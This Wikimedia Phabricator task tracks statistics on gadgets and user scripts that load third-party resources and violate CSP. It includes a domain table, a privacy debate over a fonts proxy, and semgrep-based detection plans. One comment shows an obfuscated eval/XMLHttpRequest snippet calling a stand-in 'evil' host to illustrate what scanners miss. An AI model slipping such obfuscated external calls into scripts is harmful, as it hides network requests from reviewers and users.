Page MenuHomePhabricator

Get stats on Gadgets and Users scripts loading third-party resources
Open, In Progress, MediumPublic

Description

Rationale

As part of the ongoing work on T296847, there is a need to understand how many Gadgets and User scripts would be impacted by the policy. This data will inform further discussions, especially during the upcoming policy consultation.

Initial findings

Methodology

Overall, the data collection is a mix of various methods, including Logstash queries, global-search.toolforge.org, a script that builds a list gadgets loading non-production resources. Aside from that, the exploration below contains a raw list of reported CSP violations was obtained from a Logstash querry. It features reports from February to April 2023. Finding the number Gadgets and Users scripts involved in those CSP violations was achievable by (a) trimming the URLs so as to obtain the list of domains involved in CSP violations, (b) finding the occurences of those domains across all Wikimedia projects's Gadgets and User namespaces using https://global-search.toolforge.org and or mwgrep, discarding noise such as "eval" and "data" results.

List of gadgets loading third-party resources across all projects
TBD

Top domains violating CSP restrictions
When grouped by domain origins, URLs that violate CSP rules the most seem to originate from around 50 domains.

Observations on Gadgets loading third-party resources

Generally speaking, translation tools and WMCS-hosted applications seem to be among the top domains involved in CSP violations. Around 90 gadgets appear to load resources from Wikimedia Cloud Services, while around 80 use resources originating from non-WMCS resources, including Google Translate and Yandex APIs.

#wikigadgetdomain
1az.wikipediaMediaViki:SidebarTranslate.jstranslate.google.com
2be.wikipediaMediaWiki:Gadget-GoogleTrans.jstranslate.google.com
3bjn.wikipediaMediaWiki:Gadget-GoogleTrans.jstranslate.google.com
4ckb.wikipediaمیدیاویکی:Gadget-GoogleTrans.jstranslate.google.com
5ckb.wikipediaمیدیاویکی:Gadget-LinkTranslator.jstranslate.google.com
6fa.wikiquoteمدیاویکی:Gadget-googletranslator.jstranslate.google.com
7fa.wikisourceمدیاویکی:GoogleTranslator.jstranslate.google.com
8fa.wiktionaryمدیاویکی:Gadget-googletranslator.jstranslate.google.com
9gom.wikipediaमिडियाविकी:Gadget-SidebarTranslate.jstranslate.google.com
10hy.wikipediaMediaWiki:Gadget-ArticleTranslator.jstranslate.google.com
11mk.wikisourceМедијаВики:Gadget-GoogleTrans.jstranslate.google.com
12ml.wikipediaമീഡിയവിക്കി:Gadget-GoogleTrans.jstranslate.google.com
13no.wikipediaMediaWiki:Interwiki-links.jstranslate.google.com
14pnb.wikipediaمیڈیا وکی:Gadget-SidebarTranslate.jstranslate.google.com
15ps.wikipediaميډياويکي:Gadget-SidebarTranslate.jstranslate.google.com
16shn.wikipediaမီႇတီႇယႃႇဝီႇၶီႇ:Gadget-SidebarTranslate.jstranslate.google.com
17so.wikipediaMediaWiki:Gadget-GoogleTrans.jstranslate.google.com
18ur.wikipediaمیڈیاویکی:Editnotice-4-ویکی منصوبہ تخلیق مضامین شہر-درخواست تخلیقtranslate.google.com
19ur.wikipediaمیڈیاویکی:Gadget-SidebarTranslate.jstranslate.google.com
20zh.wikipediaMediaWiki:Gadget-fixlinkstyle.jstranslate.google.com
21zh.wikivoyageMediaWiki:Gadget-fixlinkstyle.jstranslate.google.com
22vi.wikipediaMediaWiki:Gadget-SidebarTranslate.jstranslate.google.com
23ar.wikipediaميدياويكي:Gadget-LinkTranslator.jstranslate.google.com
24en.wikipediaMediaWiki:Gadget-SidebarTranslate.jstranslate.google.com
25ban.wikipediaMédiaWiki:Gadget-citations.jstools.wmflabs.org
26ca.wikipediaMediaWiki:Gadget-scribe.jstools.wmflabs.org
27es.wikivoyageMediaWiki:Kartographer.jstools.wmflabs.org
28fi.wikivoyageJärjestelmäviesti:Kartographer.jstools.wmflabs.org
29fr.wikivoyageMediaWiki:Kartographer.jstools.wmflabs.org
30gom.wikipediaमिडियाविकी:Gadget-citations.jstools.wmflabs.org
31he.wikivoyageמדיה ויקי:Kartographer.jstools.wmflabs.org
32ja.wikivoyageMediaWiki:Kartographer.jstools.wmflabs.org
33ms.wikipediaMediaWiki:Gadget-citations.jstools.wmflabs.org
34ru.wikivoyageMediaWiki:Kartographer.jstools.wmflabs.org
35test2.wikipediaMediaWiki:Kartographer.jstools.wmflabs.org
36test.wikipediaMediaWiki:Gadget-citations.jstools.wmflabs.org
37test.wikipediaMediaWiki:Gadget-scribe.jstools.wmflabs.org
38test.wikipediaMediaWiki:Gadget-scribe-v2.jstools.wmflabs.org
39ur.wikipediaمیڈیاویکی:Gadget-citations.jstools.wmflabs.org
40vec.wikipediaMediaWiki:Gadget-scribe.jstools.wmflabs.org
41yo.wikipediaMediaWiki:Gadget-citations.jstools.wmflabs.org
42zh.wikivoyageMediaWiki:Kartographer.jstools.wmflabs.org
43sv.wikipediaMediaWiki:Kartographer.jstools.wmflabs.org
44ar.wikipediaميدياويكي:Gadget-scribe.jstools.wmflabs.org
45de.wikivoyageMediaWiki:ListingEditor-es.jswikivoyage.toolforge.org
46de.wikivoyageMediaWiki:Gadget-ListingEditor.jswikivoyage.toolforge.org
47de.wikivoyageMediaWiki:Kartographer.jswikivoyage.toolforge.org
48de.wikivoyageMediaWiki:Gadget-MapTools.jswikivoyage.toolforge.org
49en.wikivoyageMediaWiki:Gadget-ListingEditor2.jswikivoyage.toolforge.org
50en.wikivoyageMediaWiki:Gadget-ListingEditor.jswikivoyage.toolforge.org
51en.wikivoyageMediaWiki:Kartographer.jswikivoyage.toolforge.org
52es.wikivoyageMediaWiki:ListingEditor.jswikivoyage.toolforge.org
53it.wikivoyageMediaWiki:Gadget-MapFrame.jswikivoyage.toolforge.org
54it.wikivoyageMediaWiki:Gadget-ListingEditor.jswikivoyage.toolforge.org
55it.wikivoyageMediaWiki:Gadget-ListingEditorBeta.jswikivoyage.toolforge.org
56it.wikivoyageMediaWiki:Kartographer.jswikivoyage.toolforge.org
57ja.wikivoyageMediaWiki:Kartographer.jswikivoyage.toolforge.org
58ja.wikivoyageMediaWiki:Gadget-ListingEditor.jswikivoyage.toolforge.org
59ru.wikivoyageMediaWiki:MapFrame.jswikivoyage.toolforge.org
60ru.wikivoyageMediaWiki:Gadget-ListingEditor.jswikivoyage.toolforge.org
61shn.wikivoyageမီႇတီႇယႃႇဝီႇၶီႇ:Gadget-ListingEditor.jswikivoyage.toolforge.org
62shn.wikivoyageမီႇတီႇယႃႇဝီႇၶီႇ:Gadget-ListingEditor2.jswikivoyage.toolforge.org
63shn.wikivoyageမီႇတီႇယႃႇဝီႇၶီႇ:Kartographer.jswikivoyage.toolforge.org
64fi.wikipediaJärjestelmäviesti:Gadget-socialMedia.jsconnect.facebook.net
65af.wiktionaryMediaWiki:Gadget-RegexMenuFramework.jstools-static.wmflabs.org
66bn.wikisourceমিডিয়াউইকি:Gadget-RegexMenuFramework.jstools-static.wmflabs.org
67bn.wiktionaryমিডিয়াউইকি:Gadget-RegexMenuFramework.jstools-static.wmflabs.org
68ca.wikisourceMediaWiki:Gadget-TemplateScript.jstools-static.wmflabs.org
69el.wikisourceMediaWiki:Gadget-RegexMenuFramework.jstools-static.wmflabs.org
70en.wikisourceMediaWiki:TemplateScript/proofreading.jstools-static.wmflabs.org
71en.wikisourceMediaWiki:TemplateScript/typography.jstools-static.wmflabs.org
72en.wikisourceMediaWiki:Gadget-RegexMenuFramework-Cleanup.jstools-static.wmflabs.org
73en.wikisourceMediaWiki:Gadget-RegexMenuFramework.jstools-static.wmflabs.org
74en.wiktionaryMediaWiki:Gadget-RegexMenuFramework.jstools-static.wmflabs.org
75es.wikibooksMediaWiki:Gadget-AjaxSysop.jstools-static.wmflabs.org
76gag.wikipediaMediaWiki:Gadget-RegexMenuFramework.jstools-static.wmflabs.org
77hi.wikipediaमीडियाविकि:Gadget-RegexMenuFramework.jstools-static.wmflabs.org
78hi.wikibooksमीडियाविकि:Gadget-RegexMenuFramework.jstools-static.wmflabs.org
79hi.wikisourceमीडियाविकि:Gadget-RegexMenuFramework.jstools-static.wmflabs.org
80id.wiktionaryMediaWiki:Gadget-RegexMenuFramework.jstools-static.wmflabs.org
81kn.wikisourceಮೀಡಿಯವಿಕಿ:Gadget-RegexMenuFramework.jstools-static.wmflabs.org
82kn.wikisourceಮೀಡಿಯವಿಕಿ:Gadget-RegexMenuFramework-Cleanup.jstools-static.wmflabs.org
83wikitech.wikimediaMediaWiki:Gadget-mobileVector.jstools-static.wmflabs.org
84mediawikiMediaWiki:Gadget-mobileVector.jstools-static.wmflabs.org
85mr.wikisourceमिडियाविकी:TemplateScript/typography.jstools-static.wmflabs.org
86mr.wikisourceमिडियाविकी:TemplateScript/proofreading.jstools-static.wmflabs.org
87or.wiktionaryମିଡ଼ିଆଉଇକି:Gadget-RegexMenuFramework.jstools-static.wmflabs.org
88pa.wikipediaਮੀਡੀਆਵਿਕੀ:Gadget-cleanup.jstools-static.wmflabs.org
89pa.wikisourceਮੀਡੀਆਵਿਕੀ:Gadget-Blockcenter.jstools-static.wmflabs.org
90pa.wikisourceਮੀਡੀਆਵਿਕੀ:Gadget-RegexMenuFramework.jstools-static.wmflabs.org
91pa.wikisourceਮੀਡੀਆਵਿਕੀ:Gadget-Cleanup.jstools-static.wmflabs.org
92pa.wikisourceਮੀਡੀਆਵਿਕੀ:Gadget-pathoschild.templatescript.jstools-static.wmflabs.org
93pt.wikibooksMediaWiki:Gadget-Informação adicional.jstools-static.wmflabs.org
94ru.wikisourceMediaWiki:Gadget-convenientDiscussions.jstools-static.wmflabs.org
95shn.wiktionaryမီႇတီႇယႃႇဝီႇၶီႇ:Gadget-RegexMenuFramework.jstools-static.wmflabs.org
96sr.wikipediaМедијавики:Gadget-Poruke.jstools-static.wmflabs.org
97ta.wikiquoteமீடியாவிக்கி:Gadget-Ajax sysop.jstools-static.wmflabs.org
98ta.wiktionaryமீடியாவிக்கி:Gadget-RegexMenuFramework.jstools-static.wmflabs.org
99test2.wikipediaMediaWiki:Gadget-MobileTW.jstools-static.wmflabs.org
100te.wikisourceమీడియావికీ:Gadget-RegexMenuFramework.jstools-static.wmflabs.org
101te.wikisourceమీడియావికీ:Gadget-RegexMenuFramework-Cleanup.jstools-static.wmflabs.org
102vi.wikisourceMediaWiki:TemplateScript/proofreading.jstools-static.wmflabs.org
103vi.wikisourceMediaWiki:TemplateScript/typography.jstools-static.wmflabs.org
104zh.wikipediaMediaWiki:Gadget-webfont.jstools-static.wmflabs.org
105es.wikipediaMediaWiki:Gadget-TemplateScript.jstools-static.wmflabs.org
106commons.wikimediaMediaWiki:Gadget-TabularImportExport.jstools-static.wmflabs.org
107test.wikipediaMediaWiki:Gadget-wikilabels.jslabels.wmflabs.org
108test.wikipediaMediaWiki:Gadget-wikilabels-loader.jslabels.wmflabs.org
109meta.wikimediaMediaWiki:Gadget-WikiLabels-loader.jslabels.wmflabs.org
110be-tarask.wikipediaMediaWiki:Common.js/coordinates.jsyandex.ru
111ce.wikipediaMediaWiki:Googlesearchyandex.ru
112ce.wikipediaMediaWiki:ExtSearchPanel.jsyandex.ru
113ce.wikipediaMediaWiki:Gadget-common-special-search.jsyandex.ru
114ka.wikipediaმედიავიკი:Search.jsyandex.ru
115ky.wikipediaМедиаВики:Search.jsyandex.ru
116lez.wikipediaMediaWiki:Search.jsyandex.ru
117myv.wikipediaMediaWiki:Common.jsyandex.ru
118ru.wikipediaMediaWiki:Gadget-yandex-speechrecognition.jsyandex.ru
119ru.wikisourceMediaWiki:Common.jsyandex.ru
120test.wikipediaMediaWiki:Gadget-ruwiki-common-special-search.jsyandex.ru
121tg.wikipediaМедиавики:Gadget-common-special-search.jsyandex.ru
122tg.wikipediaМедиавики:Gadget-yandex-speechrecognition.jsyandex.ru
123tg.wikipediaМедиавики:Search.jsyandex.ru
124tg.wikipediaМедиавики:Gadget-yandex-tts.jsyandex.ru
125tt.wikibooksМедиаВики:Search.jsyandex.ru
126ru.wikipediaMediaWiki:Powersearchtextyandex.ru
127uk.wikipediaMediaWiki:Gadget-SpeedyDeletion.jsyandex.ru
128meta.wikimediaMediaWiki:Gadget-common-special-search.jsyandex.ru
129ru.wikipediaMediaWiki:Googlesearchyandex.ru
130ru.wikipediaMediaWiki:ExtSearchPanel.jsyandex.ru
131ru.wikipediaMediaWiki:Gadget-yandex-tts.jsyandex.ru
132ru.wikipediaMediaWiki:Gadget-common-special-search.jsyandex.ru
133ar.wikipediaميدياويكي:Gadget-Timeless-Dark.cssfonts.googleapis.com
134bn.wikibooksমিডিয়াউইকি:Common.css/Typo.cssfonts.googleapis.com
135pnb.wikipediaمیڈیا وکی:Gadget-NotoNastaleeqMobile.cssfonts.googleapis.com
136ur.wikipediaمیڈیاویکی:Gadget-NotoNastaleeqMobile.cssfonts.googleapis.com
137zh.wikipediaMediaWiki:Gadget-webfontloader.jsfonts.googleapis.com
138meta.wikimediaMediaWiki:Centralnotice-template-trilogy dsk p1 lg monthly pitch1 extFontfonts.googleapis.com
139bn.wikibooksমিডিয়াউইকি:Common.css/Typo.csscdn.rawgit.com
140fa.wikipediaمدیاویکی:LoadTopRevisionsByRevertScore.jscdn.rawgit.com
141ar.wikipediaميدياويكي:Gadget-QuickEdit.jszh.moegirl.org

Observations on User scripts loading third-party resources (in progress)

Most of User scripts related to CSP violations load non-WMCS resources, including Facebook Connect and Google Analytics. It is also good to note that Google fonts are among the most loaded external resources.

Event Timeline

Restricted Application added subscribers: Reception123, Stang, Aklapper. · View Herald Transcript

Can the stats table be split by userscripts and gadgets? The later certainly have far more exposure, esp when counting userscripts of defunct users in the user table.

Can the stats table be split by userscripts and gadgets? The later certainly have far more exposure, esp when counting userscripts of defunct users in the user table.

I plan to put the data regarding user scripts in a separate section (see the very bottom of the description)

User scripts loading third-party resources
TBD

@Xaosflux, is that what you were asking for? Or did suggest that the User script stats be put in the same stats table, under separate columns?

Either a separate column, or a separate table is fine; I think there may be some exceptions to add as well, for example the page https://meta.wikimedia.org/wiki/MediaWiki:Gadget-common-special-search.js is on the list above, pointing to a yandex.ru link, however it isn't actually importing that, that is inside a comment - not sure how much effort would be needed or what the expected benefit of excluding comments would be

sguebo_WMF changed the task status from Open to In Progress.May 4 2023, 10:31 AM
sguebo_WMF triaged this task as Medium priority.
sguebo_WMF updated the task description. (Show Details)

Either a separate column, or a separate table is fine; I think there may be some exceptions to add as well, for example the page https://meta.wikimedia.org/wiki/MediaWiki:Gadget-common-special-search.js is on the list above, pointing to a yandex.ru link, however it isn't actually importing that, that is inside a comment - not sure how much effort would be needed or what the expected benefit of excluding comments would be

A separate table makes sense to me as well. I've adjusted the description accordingly. I agree that in some cases comments create some noise in the total count. I haven't figured out a much cleaner way to discard comments yet since I am using data global-search.toolforge.org. For now I am considering tweaking a copy of mwgrep to filter out comments and other patterns of noise but I am open to suggestions.

In T335892, @sguebo_WMF wrote:

It is also good to note that Google fonts are among the most loaded external resources.

Yes, one important learning here is that webfont support is strongly desired, sometimes surely for mere "fun" reasons ("I think it looks prettier"), but also for substantial reasons. e.g. T166138

This desire was why a "webfont" component was created (way back in the mists of time), but due to changing priorities it morphed into a i18n system (ULS) and staffing and mandate does not allow that team to actually address webfont-related issues.

The alternative was the GFont proxy hosted on WMCS (by a volunteer who has signed the NDA), but that's nixed by the Privacy Policy that due to some technical—legal brainfart treats the HTTP User-Agent header as directly equivalent to your social security number and bank account number. GFonts needs that header to send you the right font file (i.e. the standard protocol content negotiation), so it cannot work without it, but everything else is stripped from the request.

The stats gathered above show: 1) that there is a genuine unmet need for webfonts, and 2) work on the Privacy Policy and a Third-Party Resources policy should have enabling this use case a primary concern (within necessary strictures).

We need some way to, safely, enable a small number of webfonts by default on a project (including for non-logged in users). Locked down to interface admins, or even needing a site-request like other config, with explicit whitelisting of each font, run through an anonymizing proxy that puts User-Agent headers into buckets, etc. as necessary; but some way to support the use case.

It's orthogonal to this task, but the stats gathered here should inform secondary learnings like this, not least in terms of what the goals of the TPR process should be.

Toolforge does already have a google fonts proxy: https://fontcdn.toolforge.org/

We just need to convince people to use that instead.

Toolforge does already have a google fonts proxy: https://fontcdn.toolforge.org/

We just need to convince people to use that instead.

Toolforge is considered third-party (even if the maintainer has signed the NDA), and the Privacy Policy considers the User-Agent header to be PII that cannot be sent to Google even if everything else is stripped. See T166138. And, yes, I did check with WMF Legal. It’s currently Catch 22-impossible.

Either the Orivacy Policy needs to permit a risk-assessment based softening for HTTP headers used for content negotiation, or the WMF (not volunteers) need to implement a Google Fonts-alike in production (not Toolforge/WMCS). There are no other options open that I’ve been able to identify.

Toolforge does already have a google fonts proxy: https://fontcdn.toolforge.org/

We just need to convince people to use that instead.

Toolforge is considered third-party (even if the maintainer has signed the NDA), and the Privacy Policy considers the User-Agent header to be PII that cannot be sent to Google even if everything else is stripped. See T166138. And, yes, I did check with WMF Legal. It’s currently Catch 22-impossible.

While it's not great, it's still much better to hit toolforge than hitting Google.

Toolforge does already have a google fonts proxy: https://fontcdn.toolforge.org/

Toolforge is considered third-party (even if the maintainer has signed the NDA), and the Privacy Policy considers the User-Agent header to be PII that cannot be sent to Google even if everything else is stripped. See T166138. And, yes, I did check with WMF Legal. It’s currently Catch 22-impossible.

While it's not great, it's still much better to hit toolforge than hitting Google.

I don't disagree. But the Privacy Policy does, and WMF Legal (and whoever they have for technical advice) does. And AIUI the third-party resources policy currently does treat WMCS as third-party (I may be wrong), meaning it requires opt-in consent, meaning we can't enable fonts from there by default.

See T209998 for a different example. Note that the alternatives proposed on that task requires there to be some team at the WMF whose responsibility it is to add fonts. The only such team is the Language team. The Language team does not have the resources to fulfill such requests, and has been scoped down to only deal with i18n issues (i.e. the workarounds are outside their current scope so they can't spend time on it).

So… we can't have webfonts through volunteer tools (fontcdn) due to the Privacy Policy, and we can't have fonts installed in WMF production because it's outside every team's scope. In other words: Catch 22. It's tearing-my-hair-out level frustrating, but that's where we are.

I'm kinda derailing this task now (sorry), so my main point is that since we now have the stats above, and they point out fonts as among the main third-party resources people load, we should make sure we try to address that in some way (find a reasonable way to enable that use case without unreasonably raising the risk). It's currently bright-line prohibited, but the fontcdn solution has properties that reduce that risk to what I assert is an acceptable level. It's just not zero, which is what the current bright-line policy requires.

Toolforge does already have a google fonts proxy: https://fontcdn.toolforge.org/

We just need to convince people to use that instead.

Toolforge is considered third-party (even if the maintainer has signed the NDA), and the Privacy Policy considers the User-Agent header to be PII that cannot be sent to Google even if everything else is stripped. See T166138. And, yes, I did check with WMF Legal.

Is there a phab task where you discussed this with WMF Legal? I wonder if WMF Legal might reconsider the User-Agent header as PII for Chrome browser at least, given Google-Chrome-User-Agent-Deprecation.

Is there a phab task where you discussed this with WMF Legal?

It was email direct to privacy@ (tagged 36012 in their Zendesk, answered by Aeryn).

my main point is that since we now have the stats above, and they point out fonts as among the main third-party resources people load, we should make sure we try to address that in some way (find a reasonable way to enable that use case without unreasonably raising the risk). It's currently bright-line prohibited, but the fontcdn solution has properties that reduce that risk to what I assert is an acceptable level. It's just not zero, which is what the current bright-line policy requires.

For the specific case of fontcdn, I'd like to note that the issue of sharing User Agent information with Google would still remain, as it was pointed out by others in the past (T166138#7228181). That being said, I agree with the need to explore "a reasonable way to enable that use case without unreasonably raising the risk" in light of the data above. Speaking of that, the conversation about the policy draft is now open with some initial questions, including whether WMCS-hosted resources (eg: fonts) should be treated as third-parties: https://meta.wikimedia.org/wiki/Talk:Third-party_resources_policy

Hope to hear your thoughts there!

Toolforge is considered third-party (even if the maintainer has signed the NDA), and the Privacy Policy considers the User-Agent header to be PII that cannot be sent to Google even if everything else is stripped. See T166138. And, yes, I did check with WMF Legal. It’s currently Catch 22-impossible.

While it's not great, it's still much better to hit toolforge than hitting Google.

Apparently this toolforge tool still forwards user-agents to google, because the google fonts vary by user agent. I suggest we adapt that tool to simply override the user agent, as it is no longer required to vary on user-agent as all modern webbrowsers support woff and woff2.

Apparently this toolforge tool still forwards user-agents to google, because the google fonts vary by user agent. I suggest we adapt that tool to simply override the user agent, as it is no longer required to vary on user-agent as all modern webbrowsers support woff and woff2.

Should that be a dedicated task (under Tools and Privacy) about fontcdn? As too often I have no idea where its source is located though...

Definitely would be pro-overriding the user-agent for fontcdn (and cdnjs) — that would make it significantly easier to argue that they should be considered ok to allowlist for third-party resources.

[…] As too often I have no idea where its source is located though...

AIUI it's mostly custom config on the proxies (by special arrangement), so there's no real code to speak of. But @zhuyifei1999 can presumably clarify.

Definitely would be pro-overriding the user-agent for fontcdn (and cdnjs) — that would make it significantly easier to argue that they should be considered ok to allowlist for third-party resources.

It's logged above, but just for clarity: the cdnjs UA issue is in T210959.

To get the data on gadgets loading in much quicker way, I'm exploring a different approach that requires fewer steps. The idea is to have a script that can:

  1. Find all pages with javascript content model and namespace 8 in replicas
  2. Scan their content using the Mediawiki API to detect third-parties
  3. Build a table associating wiki project, gadget, and third-parties.

The detection of third-party resources is still funky and I'd need to fine-tune the script but the initial version of the script generates the markdown table below (and full table with ~2800 entries is available in F55305255#7434).

ProjectGadgetThird-Party Domains
ace.wikipedia.orgMediaWiki:Gadget-morebits.jsgithub.com, onehackoranother.com
ace.wikipedia.orgMediaWiki:Gadget-Twinkle.jswww.JSON.org, github.com
ace.wikipedia.orgMediaWiki:Gadget-MindMap.jswww.wikimindmap.org
ace.wikipedia.orgMediaWiki:Gadget-ArticleTraffic.jsstats.grok.se
af.wikipedia.orgMediaWiki:GeoHack.jstoolserver.org
af.wikipedia.orgMediaWiki:Common.jsopensource.org, www.google.com, www.bing.com, www.wikiwix.com

@sbassett, as a next step I'd probably use your idea of detecting TPR use by searching for things like import, importScript, mw.loader.load, xmlhttprequest, jquery.load, url for css, et al. Glad to hear if you think there's a cleaner way to avoid false positives.

The detection of third-party resources is still funky and I'd need to fine-tune the script but the initial version of the script generates the markdown table below.

I think you would have to do quite a lot of post processing. All 6 of the entries in that table are false positives (the second to last entry is a bit debatable since the code would do a third party load, however as far as i can tell it is impossible to trigger said code as the file is never loaded, which makes sense as all those urls are for toolserver, which is long dead. At the same time, maybe its desired to know about such pages even if the code is never executed). At the same time, such an approach has false negatives such as ace:MediaWiki:Gadget-GoogleTrans.js which does indeed load third pary resources (in fairness the script would have to be quite complex to detect this example)

I feel like something like semgrep would maybe be applicable here, since this is essentially static analysis.

@sbassett, as a next step I'd probably use your idea of detecting TPR use by searching for things like import, importScript, mw.loader.load, xmlhttprequest, jquery.load, url for css, et al. Glad to hear if you think there's a cleaner way to avoid false positives.

Makes sense. We'd want to ensure that we've got all of the various standard ways to load TPR covered with whatever functions etc. that are allowed. Unfortunately, this won't catch certain things like brainfu**-ified code or random obfuscations e.g.

x = new XMLHttpRequest();
var a = "\157\160\145\156";
var b = "\150\164\164\160\163\72\57\57";
var c = "\56\143\157\155";
eval("x." + a + "('GET', " + b + "'evil'" + c + ")");`)
x.send();

But that's a slightly different problem IMO as it involves intentionally malicious actors, which shouldn't really be most Gadget developers/users.

I feel like something like semgrep would maybe be applicable here, since this is essentially static analysis.

That could work as semgrep does a few nice things out of the box, like ignoring anything in comments. We have a basic "http leaks" semgrep rule that works like this, but is likely too simple for this task. Still, it could be expanded upon and semgrep could be run from a basic python CLI for additional control/processing, which we've done before.

Thanks for you input @Bawolff and @sbassett. So far the script outputs ~2800 potential candidates (See table in F55305255#7434). I'll see how to leverage semgrep to improve the filtering logic and reduce false positives.

Hey all -

I did a little experimenting with a semgrep-based version of @sguebo_WMF's script. It's available here, for now, as a personal gist:

https://gist.github.com/sbassett29/079a750c1e822e61b10db62f6ac0ce95

We'd need to clean up the python a bit and write some tests for the semgrep yaml files if we wanted to incorporate this into any official code or use it in any sort of production capacity. But I think it works fairly well. Anyhow, some notes:

  1. There are three separate semgrep rules for now - one for pure external urls (but only in code), one for css external resource sinks and one for javascript external resource sinks. These should be fairly obvious in the gist and I think the patterns, etc. should be fairly self-explanatory for anyone familiar with vaguely regular-expression-style syntax. Happy to walk through these though for anyone with questions.
  2. The three different semgrep rules get us somewhere close to the truth re: external resource usage within CSS and JS files under the MediaWiki namespace. But there are plenty of caveats:
    1. It's easy to find obvious URL strings, but that won't cover all external resource-loading sinks as URLs can be abstracted via variables, etc. So there are always going to be false positives. When we find these, we can likely add them to the semgrep rules' pattern-not-regex keys.
    2. Semgrep isn't smart enough by itself to understand nested file-importing within the context of MediaWiki JS pages. Or tell us the value of variables as it pattern-matches them within various external resource-loading sinks (e.g. mw.loader.load(url)), so these would have to be audited manually for now.
    3. Semgrep doesn't like parsing certain JS files :/ If you run the cli in the standard mode (non-table) it should display any errors at the beginning for files it was unable to parse. This really only surfaced for JS files, and it was really only a dozen or so files, which could be manually audited.
    4. There are likely some redundant findings. For example, the CSS rule finds url() and @import calls, but all of the @import calls seem to be of the format: @import url(...)
    5. The python cli should be able to be run anywhere with an internet connection and python 3, e.g. no toolforge dependencies. Caching all local files does take 2+ hours though, in my experience (hence why there's a FILE_RECACHE global that should be set to False most of the time).

That being said, this seems to get us to a better place than regular expressions alone. I've run the script against recent versions of various CSS and JS pages from the projects and found some interesting results:

  1. CSS sinks - 96 findings - P65553
  2. JS sinks - 3,351 findings - P65554 (many of these are likely false positives)
  3. Raw external URLs - 14,992 findings (many of these are false positives, used to create clickable links, etc.)
  4. Over 26,606 files total from all of the projects